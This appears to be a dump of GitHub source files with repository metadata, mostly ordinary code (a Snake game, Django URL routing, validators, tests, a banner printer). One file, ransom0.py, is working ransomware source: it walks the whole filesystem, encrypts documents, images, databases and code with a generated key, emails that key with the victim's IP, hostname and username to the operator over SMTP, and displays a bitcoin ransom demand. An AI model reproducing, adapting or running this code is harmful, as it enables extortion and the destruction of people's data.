blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
195b5b5bf3d61d63758c2c4cdb7d1942a70e832d | 3f5d531abcf69bc9f7de317ce46d45786272013d | /src/config/test/test_default.py | 7711ddcd42e45b5fc7232a940a9bceb55d370e5a | [
"MIT"
] | permissive | thak123/i-tagger | 61a8880e250069fc40c0a616e718a739bd27cb58 | dd8502947011e95b72b243fad9aad094b9a7d15c | refs/heads/master | 2021-05-14T16:51:20.799677 | 2018-01-02T12:09:36 | 2018-01-02T12:09:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 477 | py | import unittest
from helpers.config_helper import *
from config.default import create_default_config
class TestDefault(unittest.TestCase):
    """Tests that a default config file can be created and read back."""

    def test_creation(self):
        """Creating the default config populates /tmp/config.ini with the
        expected Schema/text_column entry.

        NOTE(review): ``os`` is presumably re-exported by the star import
        from helpers.config_helper -- confirm.
        """
        config_helper = ConfigManager("/tmp/config.ini")
        # Only generate the file on the first run; later runs reuse it.
        if not os.path.exists("/tmp/config.ini"):
            create_default_config(config_helper)
        self.assertEqual(os.path.exists("/tmp/config.ini"), True)
        self.assertEqual(config_helper.get_item("Schema", "text_column"), "word")
| [
"mageswaran1989@gmail.com"
] | mageswaran1989@gmail.com |
c9ac64bedd8d34cd9d725f1978fa81157b1a3b7e | f56892b1bafd7bcf0592f42bc60245e0a7cd2baa | /ransom0.py | 64e12a801cb65059ed6512c33b40774e37e5e086 | [
"MIT"
] | permissive | henrytriplette/Ransom0 | 3f82da60cac4870b2cdb921983d40f4d66bbdfb6 | 3c732a1644e0ad8af83f5a619f2d3521496a8e97 | refs/heads/master | 2022-12-21T01:04:49.499813 | 2020-09-19T06:41:28 | 2020-09-19T06:41:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,545 | py | import os, platform, random, smtplib, ssl, socket, shutil, subprocess
from os import system, name
from requests import get
from datetime import datetime
from progress.bar import Bar
from progress.spinner import Spinner
from cryptography.fernet import Fernet
key = Fernet.generate_key()
username = os.getlogin()
digits = random.randint(1111,9999)
time_now = datetime.now().time()
hostname = socket.gethostname()
IP = get('https://api.ipify.org').text
PATH = os.getcwd()
# Email Settings
port = 587
smtp_server = "" # Enter the smtp server of your email provider
sender_email = "" # Enter your address
receiver_email = "" # Enter receiver address
password = "" # your email password
extensions = (
# '.exe,', '.dll', '.so', '.rpm', '.deb', '.vmlinuz', '.img', # SYSTEM FILES - BEWARE! MAY DESTROY SYSTEM!
'.jpg', '.jpeg', '.bmp', '.gif', '.png', '.svg', '.psd', '.raw', # images
'.mp3','.mp4', '.m4a', '.aac','.ogg','.flac', '.wav', '.wma', '.aiff', '.ape', # music and sound
'.avi', '.flv', '.m4v', '.mkv', '.mov', '.mpg', '.mpeg', '.wmv', '.swf', '.3gp', # Video and movies
'.doc', '.docx', '.xls', '.xlsx', '.ppt','.pptx', # Microsoft office
'.odt', '.odp', '.ods', '.txt', '.rtf', '.tex', '.pdf', '.epub', '.md', '.txt', # OpenOffice, Adobe, Latex, Markdown, etc
'.yml', '.yaml', '.json', '.xml', '.csv', # structured data
'.db', '.sql', '.dbf', '.mdb', '.iso', # databases and disc images
'.html', '.htm', '.xhtml', '.php', '.asp', '.aspx', '.js', '.jsp', '.css', # web technologies
'.c', '.cpp', '.cxx', '.h', '.hpp', '.hxx', # C source code
'.java', '.class', '.jar', # java source code
'.ps', '.bat', '.vb', '.vbs' # windows based scripts
'.awk', '.sh', '.cgi', '.pl', '.ada', '.swift', # linux/mac based scripts
'.go', '.py', '.pyc', '.bf', '.coffee', # other source code files
'.zip', '.tar', '.tgz', '.bz2', '.7z', '.rar', '.bak', # compressed formats
)
# Text to display
RANSOM_TEXT = """
To get the decryption key, please send 50$ in bitcoin to BITCOIN ADRESS
And send proof of transfer, your id and your name to EMAIL ADRESS
"""
#Clear Screen Function
def clear():
if name == 'nt':
_ = system('cls')
else:
_ = system('clear')
def DISPLAY():
print("""
____ ___
| _ \ __ _ _ __ ___ ___ _ __ ___ / _ \
| |_) / _` | '_ \/ __|/ _ \| '_ ` _ \| | | |
| _ < (_| | | | \__ \ (_) | | | | | | |_| |
|_| \_\__,_|_| |_|___/\___/|_| |_| |_|\___/
""")
print("Time: {}".format(time_now))
print("IP Adress: {}".format(IP))
print("Platform: {}".format(platform.system()))
print("Hostname: {}".format(hostname))
print("User: {}".format(username))
print("ID: {}".format(str(digits)))
print()
def FindFiles():
load_state = 0
spinner = Spinner('Finding Files ')
while load_state != 'FINISHED':
f = open("logs/path.txt", "a")
cnt = 0
for root, dirs, files in os.walk("/"):
# for root, files in os.walk("/YOUR/TESTING/DIRECTORY"):
for file in files:
if file.endswith(extensions):
cnt += 1
TARGET = os.path.join(root, file)
f.write(TARGET+'\n')
spinner.next()
f.close()
load_state = 'FINISHED'
print()
print("Found {} target files".format(cnt))
print()
f = open("logs/cnt.txt", "w")
f.write(str(cnt))
f.close()
def encrypt(filename):
f = Fernet(key)
with open(filename, "rb") as file:
file_data = file.read()
encrypted_data = f.encrypt(file_data)
with open(filename, "wb") as file:
file.write(encrypted_data)
def StartRansom():
DISPLAY()
FindFiles()
f = open("logs/cnt.txt", "r")
cnt = f.read()
f.close()
with Bar('Encrypting', max=int(cnt)) as bar:
filepath = 'logs/path.txt'
with open(filepath) as fp:
line = fp.readline()
while line:
filename = line.strip()
try:
encrypt(filename)
except Exception:
print("!Permission denied")
pass
line = fp.readline()
bar.next()
fp.close()
print()
SendData()
clear()
DecyptMessage(False)
def decrypt(filename):
f = open("logs/key_data.txt", "r")
key = f.read()
f.close()
f = Fernet(key)
with open(filename, "rb") as file:
encrypted_data = file.read()
decrypted_data = f.decrypt(encrypted_data)
with open(filename, "wb") as file:
file.write(decrypted_data)
def DecyptMessage(INVALID_KEY):
clear()
DISPLAY()
if INVALID_KEY == True:
print("Invalid Key !")
else:
pass
print(RANSOM_TEXT)
key_data = input('key: ')
f = open("logs/key_data.txt", "w")
f.write(key_data)
f.close()
with open('logs/path.txt') as fp:
line = fp.readline()
while line:
filename = line.strip()
try:
decrypt(filename)
except PermissionError:
print("!Permission Denied")
pass
except Exception:
DecyptMessage(True)
line = fp.readline()
print("Your file have been decrypted")
fp.close()
shutil.rmtree(PATH+'/logs', ignore_errors=True)
exit()
def SendData():
DataSend = ("""
time: {}
IP: {}
Hostname: {}
username: {}
id: {}
key: {}
""").format(time_now, IP, hostname, username, str(digits), str(key))
print("Sending Data")
context = ssl.create_default_context()
with smtplib.SMTP(smtp_server, port) as server:
server.ehlo() # Can be omitted
server.starttls(context=context)
server.ehlo() # Can be omitted
server.login(sender_email, password)
server.sendmail(sender_email, receiver_email, DataSend)
if __name__ == '__main__':
# Generate digits ID or read generated value from digits.txt
if os.path.isfile("logs/digits.txt") == True:
f = open("logs/digits.txt", "r")
digits = f.read()
f.close()
DecyptMessage(False)
else:
os.mkdir("logs")
f = open("logs/digits.txt", "w")
f.write(str(digits))
f.close()
StartRansom()
| [
"noreply@github.com"
] | henrytriplette.noreply@github.com |
51e421ccc5508357725d9bd56f44da9843cecb39 | 5cb3b5f0f4eea484bf8f5fcd293d9952522b68cd | /Snake/scripts/Map.py | b80312d8b44ddf2e5887900e5e8e68be43018571 | [] | no_license | borkode/python-games | 61c65e80d53e986edd10fd51fa3e51d5aaf5b527 | 7f47b0c28d46142c33f2323709410f51dbbb4989 | refs/heads/master | 2020-04-22T13:01:52.483268 | 2019-02-12T21:23:28 | 2019-02-12T21:23:28 | 170,394,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,770 | py | import time,random,os,math
from scripts import Draw, PiControl
global yp,xp,screen,foodBeingEaten
yp=0
xp=0
foodBeingEaten = True
sz = [40,20]
global snakex,snakey,sheadp,blockInFront,snakelength
snakex = []
snakey = []
sheadp = [round(sz[0]/2),round(sz[1]/2)]
blockInFront = 0
snakelength = 0
displaylen = 0
def createBlankGraph(size, filler):
    """Return a flat list representing a ``size[0] x size[1]`` grid.

    :param size: (width, height) pair of grid dimensions.
    :param filler: value used to initialise every cell.
    :return: list of ``width * height`` copies of ``filler``.

    Note: all cells reference the same ``filler`` object, so callers
    should pass an immutable value (this module uses ints).
    """
    width = size[0]
    height = size[1]
    # List multiplication replaces the original append loop.
    return [filler] * (width * height)
Map = createBlankGraph(sz,0)
def placeFood(filler):
    """Clear any existing ``filler`` cell and drop it on a random free
    cell of the global ``Map``.

    :param filler: cell marker for the food (the game uses 1).
    :return: flat Map index where the food was placed.

    Bug fixed: the index was drawn with ``round(random.random() * len(Map))``,
    which can yield ``len(Map)`` (out of range) and is biased at the edges;
    a bare ``except: continue`` silently retried the resulting IndexError.
    ``random.randrange`` always yields a valid index. A dead pre-loop
    assignment to ``rndm`` was also removed.
    """
    # Remove the previous food marker, if any.
    for i in range(len(Map)):
        if Map[i] == filler:
            Map[i] = 0
            break
    # Keep drawing until we hit a cell not occupied by the snake (value 2).
    while True:
        rndm = random.randrange(len(Map))
        if Map[rndm] != 2:
            Map[rndm] = filler
            break
    return rndm
def setXY(x,y,setTo):
    # Write ``setTo`` into the global Map cell at column x, row y
    # (Map is a flat, row-major list of width sz[0]); return the flat index.
    Map[y*sz[0]+x] = setTo
    return y*sz[0]+x
def retXY(x,y):
    # Return the value stored at column x, row y of the global Map.
    return Map[y*sz[0]+x]
def retID(x,y):
    # Convert (x, y) grid coordinates to a flat, row-major Map index.
    return y*sz[0]+x
def checkSnakeCollide(headp):
    """Return True when the head position overlaps a snake body segment.

    :param headp: [x, y] position of the snake's head.
    :return: True on self-collision, else False.

    Reads the module globals ``snakex``/``snakey`` (segment coordinates)
    and ``snakelength``.  The ``i != snakelength-1`` test presumably skips
    the segment that is the head itself -- TODO confirm against the
    main-loop append order.
    """
    headx = headp[0]
    heady = headp[1]
    Colliding = False
    for i in range(len(snakex)):
        if snakex[i] == headx and snakey[i] == heady and i!=snakelength-1:
            Colliding = True
    return Colliding
z = 0
MoveNotUsed = True
while True:
try:
if PiControl.buttonChecked('w') and yp!=1 and MoveNotUsed:
yp=-1
xp=0
MoveNotUsed = False
elif PiControl.buttonChecked('a') and xp!=1 and MoveNotUsed:
yp=0
xp=-1
MoveNotUsed = False
elif PiControl.buttonChecked('s') and yp!=-1 and MoveNotUsed:
yp=1
xp=0
MoveNotUsed = False
elif PiControl.buttonChecked('d') and xp!=-1 and MoveNotUsed:
yp=0
xp=1
MoveNotUsed = False
if z == 30:
os.system('cls' if os.name == 'nt' else 'clear')
Map = createBlankGraph(sz,0)
Draw.setMap(Map,sz)
if foodBeingEaten:
food = placeFood(1)
foodBeingEaten = False
try:
setXY(sheadp[0],sheadp[1],2)
except:
break
Map[food] = 1
if displaylen > snakelength:
snakelength+=1
sheadp[0]=sheadp[0]+xp
sheadp[1]=sheadp[1]+yp
snakex.append(sheadp[0])
snakey.append(sheadp[1])
if len(snakex)>snakelength and len(snakey)>snakelength:
del snakex[0]
del snakey[0]
for i in range(len(snakex)):
try:
setXY(snakex[i],snakey[i],2)
except:
break
if sheadp[0]<=-1 or sheadp[0]>sz[0] or sheadp[1]<=-1 or sheadp[1]>sz[1] or checkSnakeCollide(sheadp):
break
if retID(sheadp[0],sheadp[1]) == food:
foodBeingEaten = True
displaylen+=4
Draw.drawMap()
z=0
MoveNotUsed = True
time.sleep(1/300)
z+=1
except:
continue
from scripts import lose
lose.Lose(snakelength) | [
"31637006+borkode@users.noreply.github.com"
] | 31637006+borkode@users.noreply.github.com |
52ea1aca32edac67971b05ce6d74097b20e17139 | f41b18b62c238dfca0b8b3d082c74fc290020337 | /ccadb2_ui/config/urls.py | eb2e53cc9efa2703d7be5aa26620ff77d271c747 | [
"CC0-1.0"
] | permissive | cfpb/credit-card-agreements-ui | a15b705eb9f78d617d02e2c0b681e86eb9ad7bef | 267d8eb3113e0c25f1ddfff79160094cce11f4ff | refs/heads/master | 2021-05-05T10:11:58.126365 | 2020-06-25T20:21:58 | 2020-06-25T20:21:58 | 117,900,942 | 2 | 2 | NOASSERTION | 2021-03-12T13:42:03 | 2018-01-17T22:33:59 | JavaScript | UTF-8 | Python | false | false | 139 | py | from django.conf.urls import url
from ccadb2_ui.views import CCADB2MainView
urlpatterns = [
url(r'^.*$', CCADB2MainView.as_view()),
]
| [
"chris@contolini.com"
] | chris@contolini.com |
e7743ee545024ec02333a7a4c2ad6adff4fd375f | b27617325980aecb2f70e64762a767d777fdeeaa | /test.py | a309ad6dd67a957d86eaedc7757e58c8b7491da7 | [] | no_license | HuyaAuto/huya_barrage | 0c78527f194caf48c7021bced4cbf79c251b1890 | c4f840fe1b20085a82daf4731a879049dd561c1c | refs/heads/master | 2023-02-28T09:04:24.388580 | 2021-02-03T12:30:55 | 2021-02-03T12:30:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 838 | py | import html
import pickle
import re
import sys
import urllib.parse
from huya_login import HuyaDriver
def get_cookies():
    # Log in via the Selenium-backed HuyaDriver (room id 520667), which
    # persists cookies to disk as a side effect, then release the browser.
    # NOTE(review): ``colse`` is the driver's own (misspelled) method name,
    # defined in huya_login, so it cannot be corrected here.
    driver = HuyaDriver('520667')
    driver.colse()
def read_cookies():
    """Load Selenium cookies from ./cookie/cookies.pkl and print both the
    "name=value" pairs and the yyuid cookie value.

    Bug fixed: ``yyuid`` was only assigned inside the loop, so the final
    ``print(yyuid)`` raised NameError whenever no cookie name or value
    contained 'yyuid'; it now defaults to None.
    """
    with open("./cookie/cookies.pkl", "rb") as cookiefile:
        cookies = pickle.load(cookiefile)
    cookie = [item["name"] + "=" + item["value"] for item in cookies]
    # NOTE(review): ``cookiestr`` is built but never used -- kept in case a
    # caller is added; confirm before removing.
    cookiestr = ';'.join(item for item in cookie)
    yyuid = None
    for c in cookie:
        # Substring test: matches 'yyuid' anywhere in "name=value".
        if 'yyuid' in c:
            yyuid = c.split('=')[1]
    print(cookie)
    print(yyuid)
def unescape(string):
    """Decode a percent-encoded / HTML-escaped string, then expand any
    remaining non-standard %uXXXX (or %uXX) escapes into the characters
    they name (e.g. '%u4E2D' -> the corresponding CJK character).
    """
    decoded = html.unescape(urllib.parse.unquote(string))
    # Round-trip through the filesystem encoding, as the original did,
    # to normalise the byte representation before the %u pass.
    normalised = decoded.encode(sys.getfilesystemencoding()).decode('utf-8')

    def expand(match):
        # Convert the captured hex digits into a single character.
        return chr(int(match.group(1), 16))

    return re.sub(r'%u([a-fA-F0-9]{4}|[a-fA-F0-9]{2})', expand, normalised)
| [
"1106617567@qq.com"
] | 1106617567@qq.com |
9f9ddf99a5f28e3a1cf0ff4f6cd0c5dd0a491853 | 75b52bec6d340fb367ad1bee359aa5bbf7a7aeef | /dnsdb_common/library/validator.py | e94348093453faa0e0e2056b21556df3d96f1fcd | [
"Apache-2.0"
] | permissive | cclauss/open_dnsdb | 40fd36333ebec11e6c49e819dddaa71fa0a0147d | 28c2055685be1c173d77eaa2a05d8e156ccbbbf2 | refs/heads/master | 2020-04-18T02:48:04.865234 | 2019-01-23T08:00:53 | 2019-01-23T08:00:53 | 167,176,467 | 1 | 0 | Apache-2.0 | 2019-01-23T12:04:21 | 2019-01-23T12:04:20 | null | UTF-8 | Python | false | false | 2,037 | py | # -*- coding: utf-8 -*-
import re
def _match_pattern(pattern, string):
ptn = re.search(r'(%s)' % pattern, string)
if ptn is None:
return False
if len(ptn.groups()) == 0:
return False
return ptn.group(1) == string
def valid_string(s, min_len=None, max_len=None,
                 allow_blank=False, auto_trim=True, pattern=None):
    """Validate a string value (Python 2: str/unicode).

    :param s: string to validate
    :param min_len: minimum accepted length, or None for no lower bound
    :param max_len: maximum accepted length, or None for no upper bound
    :param allow_blank: accept an empty string when True
    :param auto_trim: strip surrounding whitespace before validating
    :param pattern: regex that must match the whole string (see _match_pattern)
    :return: (is_ok, value) -- on success ``value`` is the (possibly
        trimmed) string; on failure it is a Chinese error message
        describing which check rejected the input
    """
    if s is None:
        return False, u'不能为None'
    # NOTE(review): ``basestring`` makes this function Python-2-only.
    if not isinstance(s, basestring):
        return False, u"参数类型需要是字符串"
    if auto_trim:
        s = s.strip()
    str_len = len(s)
    if not allow_blank and str_len < 1:
        return False, u"参数不允许为空"
    if max_len is not None and str_len > max_len:
        return False, u"参数长度需小于%d" % max_len
    if min_len is not None and str_len < min_len:
        return False, u"参数长度需大于 %d" % min_len
    # Pattern check is skipped for blank strings (``s`` falsy).
    if pattern is not None and s and not _match_pattern(pattern, s):
        return False, u'参数包含的字符: %s' % pattern
    return True, s
def valid_int(s, min_value=None, max_value=None):
    """Validate a string holding an integer.

    :param s: string to validate
    :param min_value: minimum accepted value, or None for no lower bound
    :param max_value: maximum accepted value, or None for no upper bound
    :return: (is_ok, value) -- on success ``value`` is the parsed int,
        otherwise an error message string

    Fixes: a non-numeric string previously escaped as an uncaught
    ValueError instead of being reported through the (False, message)
    contract, and the ``basestring`` check is now Python-2/3 compatible.
    """
    try:
        string_types = basestring  # Python 2
    except NameError:
        string_types = str  # Python 3
    if s is None:
        return False, "cannot is None"
    if not isinstance(s, string_types):
        return False, "must a string value"
    try:
        s = int(s)
    except ValueError:
        return False, "%s is not a valid integer" % s
    if max_value is not None and s > max_value:
        return False, "%d must less than %d" % (s, max_value)
    if min_value is not None and s < min_value:
        return False, "%d must greater than %d" % (s, min_value)
    return True, s
| [
"20832776@qunar.com"
] | 20832776@qunar.com |
be629528e4eaace2669ba51d420be9465af6073d | 3bbf0da46ac3393ef10f4f795092895b20794121 | /initialize_app.py | fc598333ac0d0a8538c5d77489f4b09cc4cab756 | [] | no_license | maxcnunes/i-sweated-yesterday | 3bffacbb779f99d50cb5051e4abb1cd7d4322e67 | 1eaa4033b555f62053f3ea9dda345a8a1c172846 | refs/heads/master | 2020-05-18T19:44:32.022693 | 2013-08-06T04:00:09 | 2013-08-06T04:00:09 | 7,216,338 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 72 | py | from app import app as application
application.run(debug=True,port=8090) | [
"maxcnunes@gmail.com"
] | maxcnunes@gmail.com |
6d5c7cd0e3bc220593ce62b828057872ace141ca | f2a93ef5a3083d0eeb59298e7e1a723898446bc2 | /Functions_Intro/banner.py | 57698ed22c82276a6de24848c87d76a31ec987fd | [] | no_license | AndreUTF/PythonProjects | 16fa017519c8487a4b46a433fc16d74864270f63 | 8d4aab3c52afc37f283785e4f9fa5932ec1cc905 | refs/heads/master | 2022-12-24T02:43:01.766245 | 2020-10-02T20:54:23 | 2020-10-02T20:54:23 | 299,713,156 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,671 | py | def banner_text(text: str = " ", screen_width: int = 80) -> None:
""" Print a string centred, with ** either side.
:param text: The string to print.
An asterisk (*) will result in a row of asterisks.
The default will print a blank line, with a ** border at
the left and right edges.
:param screen_width: The overall width to print within
(including the 4 spaces for the ** either side).
:raises ValueError: if the supplied string is too long to fit.
"""
if len(text) > screen_width - 4:
raise ValueError("String '{0}' is larger than specified width {1}"
.format(text, screen_width))
if text == "*":
print("*" * screen_width)
else:
centred_text = text.center(screen_width - 4)
output_string = "**{0}**".format(centred_text)
print(output_string)
def banner_text1(text=" ", screen_width=80):
    """Print *text* centred between ``**`` borders (duplicate of
    ``banner_text`` kept for the exercise).

    :param text: string to display; "*" prints a solid asterisk row.
    :param screen_width: total output width including the borders.
    :raises ValueError: if *text* cannot fit inside the borders.

    Bug fixed: the body unconditionally reset ``screen_width`` to 80,
    silently ignoring the width every caller passed in (all the module's
    calls pass 60 but were rendered at 80 columns).
    """
    if len(text) > screen_width - 4:
        raise ValueError("String {0} is larger then specified width {1}"
                         .format(text, screen_width))
    if text == "*":
        print("*" * screen_width)
    else:
        centred_text = text.center(screen_width-4)
        output_string = "**{0}**".format(centred_text)
        print(output_string)
banner_text("*", 60)
banner_text("Always look on the bright side of life...", 60)
banner_text("If life seems jolly rotten,", 60)
banner_text("There's something you've forgotten!", 60)
banner_text("And that's to laugh and smile and dance and sing,", 60)
banner_text(screen_width=60)
banner_text("When you're feeling in the dumps,", 60)
banner_text("Don't be silly chumps,", 60)
banner_text("Just purse your lips and whistle - that's the thing!", 60)
banner_text("And... always look on the bright side of life...", 60)
banner_text("*", 60)
# result = banner_text("Nothing is returned")
# print(result)
banner_text1("*", 60)
banner_text1("Always look on the bright side of life...", 60)
banner_text1("If life seems jolly rotten,", 60)
banner_text1("There's something you've forgotten!", 60)
banner_text1("And that's to laugh and smile and dance and sing,", 60)
banner_text1(screen_width=70)
banner_text1("When you're feeling in the dumps,", 60)
banner_text1("Don't be silly chumps,", 60)
banner_text1("Just purse your lips and whistle - that's the thing!", 60)
banner_text1("And... always look on the bright side of life...", 60)
banner_text1("*", 60)
# numbers = [4, 2, 7, 5, 8, 3, 9, 6, 1]
# print(numbers.sort())
# numbers = [4, 2, 7, 5, 8, 3, 9, 6, 1]
# numbers.sort()
# print(numbers)
| [
"noreply@github.com"
] | AndreUTF.noreply@github.com |
2a16450cb4f5cfeb4ffc27c9b5c5a1b70952126a | b808c2842ea6d3beaa80aed6f107bde79542a6af | /python.py | 4ff001303867a884d50a3ca89072bff12bc5f925 | [] | no_license | LinXiaAA/chuntian | 6c9cc9e84eb211bb0a22dcdd823ff46bac53583c | 318175d1156d30bb94a7aef37dba6564d3df7f2c | refs/heads/master | 2022-12-16T14:19:55.148680 | 2020-09-17T04:51:35 | 2020-09-17T04:51:35 | 296,221,533 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 692 | py | # -*- coding: utf-8 -*-
import serial
import struct
import requests
url = ""
def pushup(loadup):
    """Upload ``loadup`` as form data to the module-level ``url``.

    :param loadup: dict of values to send.
    :return: response body text, or "HTTP ERROR" on any failure.

    Bug fixed: the response was bound to ``re`` but the status check used
    the undefined name ``r``, so NameError was raised and swallowed by the
    bare except -- every call returned "HTTP ERROR" even on success.  The
    bare except is also narrowed to Exception so Ctrl-C still works.

    NOTE(review): requests.get with a data= payload is unusual; the caller
    probably wants requests.post -- confirm against the server.
    """
    try:
        response = requests.get(url, data=loadup)
        response.raise_for_status()
        return response.text
    except Exception:
        return "HTTP ERROR"
if __name__ == '__main__':
    # Bug fixed: the guard compared against "_main_" (single underscores),
    # so the reader loop never ran when the script was executed directly.
    arduino = serial.Serial('/dev/ttyUSB0', 57600, timeout=.1)
    while True:
        # The Arduino sketch presumably prefixes each 12-byte record with a
        # "DUANWEIMING" sync line -- confirm against the firmware.
        if arduino.readline() == b'DUANWEIMING\n':
            data = arduino.read(12)
            # Little-endian record: int16 bpm, int16 IR signal size,
            # float32 value, uint32 timestamp (2+2+4+4 = 12 bytes).
            bpm, IR_signalSize, xy, time = struct.unpack("<hhfL", data)
            data = {"bpm": bpm, "ir": IR_signalSize, "xy": xy, "time": time}
            pushup(data)
            # Bug fixed: the original concatenated str with the unpacked
            # numbers ("bpm:"+bpm+...), which raises TypeError; format the
            # values instead, keeping the same labels.
            print("bpm:{}\nir:{}\n血氧:{}\n时间:{}".format(bpm, IR_signalSize, xy, time))
| [
"noreply@github.com"
] | LinXiaAA.noreply@github.com |
1bc8dcec7ce59d12a22ca5f3caf013473edf67eb | 3f93a0c460ab63d6723103ec7bc7bc125612ebd2 | /plugin/gestureLogic/GestureAlgorithm.py | b7c5dc5f23991fd3f249ba788a55658a63a71fbc | [] | no_license | umlfri-old/addon_gestures | 88eb85473739b719e8f93b894c395a208594c3a4 | 3d85b8a7c463e1ca06c1e9048aa41482d74f5c78 | refs/heads/master | 2021-01-20T16:35:41.118668 | 2011-03-20T19:28:53 | 2011-03-20T19:28:53 | 90,841,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,187 | py | class CGestureAlgorithm(object):
"""
Interface for any recognition algorithm.
"""
def __init__(self):
"""
Constructor of class CGestureAlgorithm.
"""
#algorithm name
self.name = ''
#algorithm ID
self.algorithmID = 0
#current gesture coordinates
self.coordinates = []
#well known gestures(CGestureSet)
self.patternGestures = []
def Recognition(self,type):
"""
Function which recognize gesture.
@type type: string
@param type: gesture type
"""
pass
def SetCoordinates(self,coor):
"""
Coordinates setter.
@type coor: list
@param coor: gesture coordinates
"""
self.coordinates = coor
def GetCoordinates(self):
"""
Coordinates getter
@rtype : list
@return: gesture coordinates
"""
return self.coordinates
def DeleteCoordinates(self):
"""
Delete current coordinates.
"""
del self.coordinates[:] | [
"pasikavec@gmail.com"
] | pasikavec@gmail.com |
17af632bafeab7fe05ec6df418b301f86f74b0cb | 582df95fc9b1d00e6c75321ad6a7894e0722245e | /tests/test_download_model.py | 34baadec66352e161086017e45cd3ea66aadfa94 | [
"Apache-2.0"
] | permissive | viniarck/podcaststore-django | 2c4db217126e3dbdf1244bb22ae1aea0cd502874 | 90316ffb18793b089291a0e28ac3ee2bb5e458cb | refs/heads/master | 2020-06-29T13:16:18.449358 | 2019-12-05T11:44:34 | 2019-12-05T11:44:34 | 200,547,759 | 0 | 0 | Apache-2.0 | 2020-06-05T22:33:18 | 2019-08-04T22:29:38 | Python | UTF-8 | Python | false | false | 828 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import pytest
from podcaststore_api.models.download import Download, DownloadSerializer
class TestDownloadModel:
    """Unit tests for the Download model's __repr__."""

    @pytest.mark.django_db
    def test_repr(self, create_download: Download) -> None:
        """__repr__ embeds the row's id, track_id and date."""
        download = create_download
        assert (
            repr(download)
            == f"Download({download.id}, {download.track_id}, {download.date})"
        )
class TestTagSerializer:
    """Serialization tests for DownloadSerializer.

    NOTE(review): the class is named TestTagSerializer but exercises
    DownloadSerializer -- likely a copy/paste leftover; renaming would be
    safe since pytest discovers classes by the Test prefix.
    """

    @pytest.mark.django_db
    def test_ser_data(self, create_download: Download) -> None:
        """Serialized payload exposes the id, track_id and date fields."""
        download_serd = DownloadSerializer(create_download)
        for field in ("id", "track_id", "date"):
            assert field in download_serd.data
| [
"viniarck@gmail.com"
] | viniarck@gmail.com |
25d2042a734b11a8bb5cabcf79b3bc9e896b5d99 | 12edaaeca754e0d347a584d8c05fe88d5ea9f8e5 | /test.py | 9bf1a3a476c7e750712783a509b870d8e51960be | [] | no_license | silasburger/lyft-technical-sample | 521d3ea8914627d7241dd876f259c5df497877b1 | 9748f14cb157d9a4951f6df9db28ce7468bd408c | refs/heads/master | 2020-05-14T22:57:52.977222 | 2019-04-18T17:47:23 | 2019-04-18T17:47:23 | 181,988,382 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,653 | py | from app import app
from flask import jsonify
import unittest
from cut_string import cut_string
class ApplicationTest(unittest.TestCase):
    """Unit and integration tests for the string-cutting Flask service."""

    def setUp(self):
        """Create a fresh Flask test client before each test."""
        self.client = app.test_client()

    def test_cut_string(self):
        """Unit test the cut_string function directly."""
        self.assertEqual(cut_string('uiaytbjkc'), 'abc')
        self.assertEqual(cut_string('qw'), '')
        self.assertEqual(cut_string('wecvs'), "c")

    def test_response(self):
        """Integration test of the /test route (odd, even and empty input)."""
        response_odd = self.client.post('/test', json={
            "string_to_cut":"iamyourlyftdriver",
        })
        response_even = self.client.post('/test', json={
            "string_to_cut":"zxawub",
        })
        response_empty = self.client.post('/test', json={
            "string_to_cut":"",
        })
        self.assertEqual(response_odd.json["return_string"], "muydv")
        self.assertEqual(response_even.json["return_string"], "ab")
        self.assertEqual(response_empty.json["return_string"], "")

    def test_error_response(self):
        """Bad payloads (wrong key, non-string value) yield error messages."""
        response_wrong_key = self.client.post('/test', json={
            "string_to_cu":"iamyourlyftdriver",
        })
        response_not_string = self.client.post('/test', json={
            "string_to_cut":2,
        })
        self.assertEqual(response_wrong_key.json["message"], "\"string_to_cut\" key not provided in body of request")
        self.assertEqual(response_not_string.json["message"], "The value you provided is not a string")
| [
"ybsilas@gmail.com"
] | ybsilas@gmail.com |
7304e40e46fc2c54dfa722867c321f2c367920fb | ff8a38383b7fbb05cf2f660a8a4296a44859ff31 | /py-client/program_c2.py | ca25576d3d0b3f7fb34cf871f4d6764b81db252c | [] | no_license | sudeepalbal123/cs2910Project | d7cf0ac55569ffc6f6e7d7ff4388c8db2c63dc36 | 367dc032ee6b71d0199a85d4e66fd122dc3f3fdc | refs/heads/main | 2023-04-23T18:11:16.481058 | 2021-05-04T10:41:08 | 2021-05-04T10:41:08 | 364,197,805 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 350 | py | # Read the file created by first container
input_file = open("out.txt","r")
output_file = open("output.txt","w+")
# Read the file and count the unique letters from that file
while True:
line = input_file.readline()
if not line:
break
output_file.write(line)
input_file.close()
output_file.close()
| [
"sudeep.albal@gmail.com"
] | sudeep.albal@gmail.com |
